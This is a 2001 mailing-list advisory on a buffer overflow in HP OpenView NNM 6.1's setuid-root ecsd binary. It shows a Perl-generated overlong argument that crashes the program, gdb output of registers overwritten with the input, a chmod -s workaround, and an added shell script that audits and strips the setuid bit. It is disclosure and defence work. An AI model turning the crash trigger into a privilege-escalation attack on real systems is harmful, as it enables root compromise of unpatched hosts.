HP OpenView NNM v6.1 buffer overflow

From: Jonas Eriksson (jeat_private)
Date: Wed May 23 2001 - 09:00:57 PDT

    HP OpenView NNM v6.1 buffer overflow
    
    
    The problem..
    
    HP OpenView NNM v6.1 has a buffer overflow in the suid-root file ecsd 
    located in the /opt/OV/bin/ directory.
    
    ecsd is not used in NNM, but is shipped and installed suid-root as default.
    
    
    Details..
    
    je@openview~> uname -a
    SunOS openview 5.8 Generic_108528-07 sun4u sparc SUNW,UltraSPARC-IIi-Engine
    je@openview~> ls -la /opt/OV/bin/ecsd
    -r-sr-xr-x   1 root     bin    2953640 maj 18 11:20 /opt/OV/bin/ecsd
    je@openview~> pwd
    /
    je@openview~> /opt/OV/bin/ecsd -restore_config `perl -e 'print "A"x312'`
    Failed to restore engine
    configuration; "//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[snip..]" not found.
    je@openview~> /opt/OV/bin/ecsd -restore_config `perl -e 'print "A"x313'`
    Segmentation fault (core dumped)
    je@openview~> gdb /opt/OV/bin/ecsd --core=core
    [snip..]
    Core was generated by `/opt/OV/bin/ecsd -restore_config AAAAAAAA[snip..]'.
    [snip..]
    #0  0x28eb8 in main ()
    (gdb) inf reg        
    [snip..]
    l1             0x41414141       1094795585
    l2             0x41414141       1094795585
    l3             0x41414141       1094795585
    l4             0x41414141       1094795585
    l5             0x41414141       1094795585
    l6             0x41414141       1094795585
    l7             0x41414141       1094795585
    i0             0x41414141       1094795585
    i1             0x41414141       1094795585
    i2             0x41414141       1094795585
    i3             0x41414141       1094795585
    i4             0x41414141       1094795585
    i5             0x41414141       1094795585
    fp             0x41410028       1094778920
    [snip..]
    (gdb)
    
    
    Vendor Status..
    
    Hewlett-Packard has been contacted. They are currently working on patches
    for this vulnerability.                                        
    
    
    Workaround..
    
    chmod -s /opt/OV/bin/ecsd

    This will remove the setuid bit from /opt/OV/bin/ecsd, therefore if
    someone does exploit this vulnerability, they won't gain higher privileges.
    
    
    Regards
    Jonas Eriksson
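The workaround in the post, as an added shell audit that is not part of the original message or any HP tooling: it checks whether the binary carries the setuid bit, strips it the way `chmod -s` does, verifies the bit is gone, and (going slightly beyond the post) counts what else under the same directory is still setuid. The optional path argument is an assumption added so the functions can be exercised on a scratch file; defaults are the advisory's /opt/OV/bin/ecsd and /opt/OV/bin.

```shell
#!/bin/sh
# Added example, not from the advisory: audit the setuid bit on the binary
# the post names and apply its workaround, confirming the result.
# The path argument is an assumption for testing; default is the advisory's path.

# Print "yes" if the file carries the setuid bit, "no" otherwise.
# Returns 2 if the path does not exist.
is_setuid() {
    f=${1:-/opt/OV/bin/ecsd}
    [ -e "$f" ] || { echo "missing: $f" >&2; return 2; }
    # POSIX find: -prune stops descent; -perm -4000 matches only when setuid is set.
    if [ -n "$(find "$f" -prune -perm -4000)" ]; then
        echo yes
    else
        echo no
    fi
}

# Strip setuid and setgid (what the advisory's 'chmod -s' does) and confirm.
# Returns 0 when the bit is gone, 1 if chmod failed or the bit is still present.
apply_workaround() {
    f=${1:-/opt/OV/bin/ecsd}
    chmod u-s,g-s "$f" || return 1
    [ "$(is_setuid "$f")" = no ]
}

# Count regular files with the setuid bit under a directory (default: the NNM
# bin directory), so an administrator can see what else shares this exposure.
count_setuid() {
    d=${1:-/opt/OV/bin}
    find "$d" -type f -perm -4000 | wc -l | tr -d ' '
}

# Usage, as root on the affected host (script is sourced, functions then called):
#   . ./audit_ecsd.sh
#   is_setuid          # prints yes/no for /opt/OV/bin/ecsd
#   apply_workaround   # removes the bit; nonzero exit if it did not take effect
#   count_setuid       # remaining setuid files under /opt/OV/bin
```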
    
